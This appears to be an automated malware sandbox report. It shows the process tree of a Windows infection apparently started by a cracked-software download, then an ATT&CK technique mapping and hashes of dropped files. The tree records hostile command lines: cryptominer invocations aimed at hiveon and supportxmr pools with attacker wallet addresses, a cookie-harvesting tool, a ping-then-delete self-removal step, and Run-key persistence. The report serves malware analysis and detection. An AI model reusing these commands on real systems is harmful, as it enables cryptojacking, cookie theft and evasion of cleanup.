                                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                        10⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:5668
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u54cv5ht.gmo\GcleanerWW.exe /mixone & exit
                                                                                                    8⤵
                                                                                                      PID:5864
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1hrulrf4.21f\toolspab1.exe & exit
                                                                                                      8⤵
                                                                                                        PID:5292
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1hrulrf4.21f\toolspab1.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\1hrulrf4.21f\toolspab1.exe
                                                                                                          9⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:6024
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1hrulrf4.21f\toolspab1.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\1hrulrf4.21f\toolspab1.exe
                                                                                                            10⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:2224
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sqce3oj0.lkw\c7ae36fa.exe & exit
                                                                                                        8⤵
                                                                                                          PID:4772
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sqce3oj0.lkw\c7ae36fa.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\sqce3oj0.lkw\c7ae36fa.exe
                                                                                                            9⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:3280
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sekit1bs.fqp\app.exe /8-2222 & exit
                                                                                                          8⤵
                                                                                                            PID:5552
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\sekit1bs.fqp\app.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\sekit1bs.fqp\app.exe /8-2222
                                                                                                              9⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2768
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sekit1bs.fqp\app.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sekit1bs.fqp\app.exe" /8-2222
                                                                                                                10⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:4748
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4660
                                                                                                    • C:\Users\Admin\AppData\Roaming\A8FE.tmp.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\A8FE.tmp.exe"
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:5080
                                                                                                      • C:\Users\Admin\AppData\Roaming\A8FE.tmp.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\A8FE.tmp.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks processor information in registry
                                                                                                        PID:4992
                                                                                                    • C:\Users\Admin\AppData\Roaming\ABBE.tmp.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\ABBE.tmp.exe"
                                                                                                      5⤵
                                                                                                        PID:4356
                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w4870@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                          6⤵
                                                                                                            PID:5360
                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w8668 --cpu-max-threads-hint 50 -r 9999
                                                                                                            6⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            PID:5496
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                          5⤵
                                                                                                            PID:5820
                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                              ping 127.0.0.1
                                                                                                              6⤵
                                                                                                              • Runs ping.exe
                                                                                                              PID:6060
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks whether UAC is enabled
                                                                                                          PID:5980
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe"
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Adds Run key to start application
                                                                                                          PID:4576
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5464
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2724
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5584
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5216
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                    1⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:5008
                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    PID:2220
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:4100
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    • Modifies registry class
                                                                                                    PID:5048
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                    1⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:1424
                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    PID:5904
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:4956
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:4244
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:5088
                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                    1⤵
                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                    PID:5052
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:2240
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      C:\Windows\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:5116
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:4868
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:5032
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:5740
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:5552
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:4920
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:2392
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:5772
                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                          1⤵
                                                                                                            PID:6080
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                            1⤵
                                                                                                              PID:4324
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                              1⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:3364
                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              PID:4488
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:4332
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:4996
                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                C:\Windows\system32\WerFault.exe -u -p 4996 -s 2948
                                                                                                                2⤵
                                                                                                                • Program crash
                                                                                                                PID:3536
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:5896

                                                                                                            Network

                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                            Persistence

                                                                                                            Registry Run Keys / Startup Folder

                                                                                                            1
                                                                                                            T1060

                                                                                                            BITS Jobs

                                                                                                            1
                                                                                                            T1197

                                                                                                            Defense Evasion

                                                                                                            Modify Registry

                                                                                                            4
                                                                                                            T1112

                                                                                                            BITS Jobs

                                                                                                            1
                                                                                                            T1197

                                                                                                            Install Root Certificate

                                                                                                            1
                                                                                                            T1130

                                                                                                            Credential Access

                                                                                                            Credentials in Files

                                                                                                            4
                                                                                                            T1081

                                                                                                            Discovery

                                                                                                            Software Discovery

                                                                                                            1
                                                                                                            T1518

                                                                                                            Query Registry

                                                                                                            4
                                                                                                            T1012

                                                                                                            System Information Discovery

                                                                                                            5
                                                                                                            T1082

                                                                                                            Security Software Discovery

                                                                                                            1
                                                                                                            T1063

                                                                                                            Peripheral Device Discovery

                                                                                                            1
                                                                                                            T1120

                                                                                                            Remote System Discovery

                                                                                                            1
                                                                                                            T1018

                                                                                                            Collection

                                                                                                            Data from Local System

                                                                                                            4
                                                                                                            T1005

                                                                                                            Command and Control

                                                                                                            Web Service

                                                                                                            1
                                                                                                            T1102

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                              MD5

                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                              SHA1

                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                              SHA256

                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                              SHA512

                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                              MD5

                                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                                              SHA1

                                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                              SHA256

                                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                              SHA512

                                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                            • C:\Program Files\Windows Defender Advanced Threat Protection\XUIOMRCWGW\ultramediaburner.exe
                                                                                                              MD5

                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                              SHA1

                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                              SHA256

                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                              SHA512

                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                            • C:\Program Files\Windows Defender Advanced Threat Protection\XUIOMRCWGW\ultramediaburner.exe
                                                                                                              MD5

                                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                              SHA1

                                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                                              SHA256

                                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                              SHA512

                                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                            • C:\Program Files\install.dat
                                                                                                              MD5

                                                                                                              806c3221a013fec9530762750556c332

                                                                                                              SHA1

                                                                                                              36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                              SHA256

                                                                                                              9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                              SHA512

                                                                                                              56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                            • C:\Program Files\install.dll
                                                                                                              MD5

                                                                                                              fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                              SHA1

                                                                                                              6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                              SHA256

                                                                                                              9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                              SHA512

                                                                                                              0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\59D1C89B35882FB67B19C498B4BDBDE0
                                                                                                              MD5

                                                                                                              f1442499776895f3210c23374a2b9642

                                                                                                              SHA1

                                                                                                              1d99d71fe59b2bc0edcb248f65c1c553cfd6c5ef

                                                                                                              SHA256

                                                                                                              5f65daa9b1aecf50147bf7b93182d2f2fe8e2af1e25f31dae36c883b09a7e4b1

                                                                                                              SHA512

                                                                                                              09c337d17b8a48be341a4f9cf161ac0f647386d1d92d02e99dc358f3d3937aeee053defef91dacf21c240e92999e714f8b3403c9c4294fd2d21532cd4a3ddfc8

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4
                                                                                                              MD5

                                                                                                              d1b1f562e42dd37c408c0a3c7ccfe189

                                                                                                              SHA1

                                                                                                              c01e61a5c5f44fb038228b7e542f6a8d7c8c283d

                                                                                                              SHA256

                                                                                                              7f468f04fe5a1b0616685f157a4285090b6ed3858d4cd9efe915aaeed83c158e

                                                                                                              SHA512

                                                                                                              404d279fabd4886008e47e9138f799cf398f0aa4c8556192d6e45dbcde99eac2cd65c47b9e0b88bd6d3a6529818f6048a23a197a913fb917b19dffbbd5d75850

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
                                                                                                              MD5

                                                                                                              8da42796ee48364c3c8d1df88b52d510

                                                                                                              SHA1

                                                                                                              7b0bff5c8a1abfe6414faf75b63ec099ef242561

                                                                                                              SHA256

                                                                                                              509e74c2182406e69d588179dd9701cbd12a5c6aa60e8abc3e89a9203fd50859

                                                                                                              SHA512

                                                                                                              9c352b58981f87de5e5e17844e13a3bf0954f28e9a8d13a63daacbc9f024b60d99556b19224ca6407f141f0056741b5cf3911d98c26fa22a9e0ea234f4b1e4a0

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\59D1C89B35882FB67B19C498B4BDBDE0
                                                                                                              MD5

                                                                                                              b4a031f033b46693680e9b126a8c152e

                                                                                                              SHA1

                                                                                                              0992f3202d8ae839d9561cfa6b876856e76acd61

                                                                                                              SHA256

                                                                                                              56a663d023fe86b180c4b071c07a5f393a90b7241742f7ec0cfe9ef92073d286

                                                                                                              SHA512

                                                                                                              1b14800851bd06be01ea79a04d2b03ca0d8adb9742695f4bb8d3a58b1996f35dd40609bd3fd2a6d6961dfec68c02813268c95c29c9b58334239f0fef63ed99fe

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4
                                                                                                              MD5

                                                                                                              7682813e696081b6875db09e5c01796a

                                                                                                              SHA1

                                                                                                              422036725347fc088379b6577e254a3eeb3cc8fc

                                                                                                              SHA256

                                                                                                              7b71bca129135a8d8a2d006f20f8d4cb1cd46f17966f14c60ddc36763d4510eb

                                                                                                              SHA512

                                                                                                              506f5349467b58ed17642a662b123a806bdd72a5f4744df4aa99d50da2bdf84a28c99b50857ae36a772fac2e4b730a92ec2e1c25c348f3fd6d53a954bc428e01

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
                                                                                                              MD5

                                                                                                              214eb34b53e163acc7364a9c451d21a0

                                                                                                              SHA1

                                                                                                              9904dcc2f8fc6a25f32b50c3b6ce81f4d777572a

                                                                                                              SHA256

                                                                                                              4aaa88788a366a286beeefde29d6dc2310d5063190823cbd6e489e97650b11f3

                                                                                                              SHA512

                                                                                                              34c70b1510d25224077ca7e3005cc1dea89bc463a5340ea95b359aafaab8b04b4ff2e2b4a0149414e01abb94a22d7c7e6376cb8d733c304a5ec91870621e9238

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GDGLHSEM\Trepcad_6_6_00_serial_keys_gen_by_FFF.zip.vi85dmw.partial
                                                                                                              MD5

                                                                                                              ccad3f95ff3b49167285e36f30cde547

                                                                                                              SHA1

                                                                                                              f3780e52ca0b68818188637a760c6b3863223139

                                                                                                              SHA256

                                                                                                              a00b69040b60856be054369f87c7b1eebba772a3999908c8e36fbf0307a493d6

                                                                                                              SHA512

                                                                                                              986d233d411f774f93ce723173dc733411adffbf2653f5564c9852da0f5643e670da3d14f5061c88b7c02724fb9194f522813472a00c8abe4404accb27c9a4c2

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\5FM375PF.cookie
                                                                                                              MD5

                                                                                                              c78c70d6896034492d01f0f3ac1dca9e

                                                                                                              SHA1

                                                                                                              e37a68eb018a9dacde981e6767cae4a363a82bec

                                                                                                              SHA256

                                                                                                              0b079e8188d9535c0d6c9b1178acf364b9e50fc71618e7ba106aa06ed838e2b2

                                                                                                              SHA512

                                                                                                              7602d142f48736eaa55e78e8362363bc330929c5b18379a72716a9ba15e692ffdac83b1448515a0cc52f1a79f00c953a88b81d0392a8ae25c78c858a42c51bc9

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\LE42Q9L0.cookie
                                                                                                              MD5

                                                                                                              586c048c5679e5373c95d568efe58f2e

                                                                                                              SHA1

                                                                                                              bba98a302a906f52d080dfcb53a5208d66aa7040

                                                                                                              SHA256

                                                                                                              6273a2a87b47a4cdad8847a51c2b270d63c4f4004ff342be71ec720d8f5e6324

                                                                                                              SHA512

                                                                                                              b0686f68477c4f23a3c51ed54c0eadd19f978bf34ea98df5f126337655fe7515bacf235991afc0935f0469e8b5f379948ffa0ac50d1cf75425c358c4dab8c0d7

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\YL28SC94.cookie
                                                                                                              MD5

                                                                                                              1fdf6f4c9bf602f60a99691e83bec223

                                                                                                              SHA1

                                                                                                              0badfe6c6aabb6ed2e7ff8c64ebc8198c57fd543

                                                                                                              SHA256

                                                                                                              8d2f2228ddb1e324ea30104bc1eb11b35b2253632c7f0527a850bf7ce5782a56

                                                                                                              SHA512

                                                                                                              a1c2bb6d8185d19c186e105d62bf1fa47af1e6bb5adbc5e1f12affb1a024850de2704393e221a27800235959453ce824819b6e97de1f01313f049d97e03eda28

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5VOMHR.c
                                                                                                              MD5

                                                                                                              0c107baa7bbb153bdc20d4b24cd692d0

                                                                                                              SHA1

                                                                                                              0bc9a65788a044dab4d9af20c0612362b8083277

                                                                                                              SHA256

                                                                                                              9e1309ef8dd1c1d4ce8ed70536044b00fa168de33afbbb0b91e13383b95e46d5

                                                                                                              SHA512

                                                                                                              fcdc6174eaabed4f3daa36c8cee5697f7690bb59c3a35990ecbbea259e3e5b2e38d2d546ae1698e8f19979224abf6f69d364afd2143b8e70c86c5bd5fc7a66c3

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\92-3cea9-8c3-78ab6-03e1b154af383\ZHapysolama.exe
                                                                                                              MD5

                                                                                                              18e49540637bccc9b3a7ca3d48cae223

                                                                                                              SHA1

                                                                                                              b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                              SHA256

                                                                                                              698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                              SHA512

                                                                                                              a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\92-3cea9-8c3-78ab6-03e1b154af383\ZHapysolama.exe
                                                                                                              MD5

                                                                                                              18e49540637bccc9b3a7ca3d48cae223

                                                                                                              SHA1

                                                                                                              b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                              SHA256

                                                                                                              698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                              SHA512

                                                                                                              a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\92-3cea9-8c3-78ab6-03e1b154af383\ZHapysolama.exe.config
                                                                                                              MD5

                                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                                              SHA1

                                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                              SHA256

                                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                              SHA512

                                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe
                                                                                                              MD5

                                                                                                              67b5f6f9976a10084f46cee4e1d03af0

                                                                                                              SHA1

                                                                                                              51b32462760b4fc127ef982ff8510e03bb669aab

                                                                                                              SHA256

                                                                                                              f66dc794146488858afd11c519ea203ec91d294b3b9bfb8d32746e74b3b9ba5f

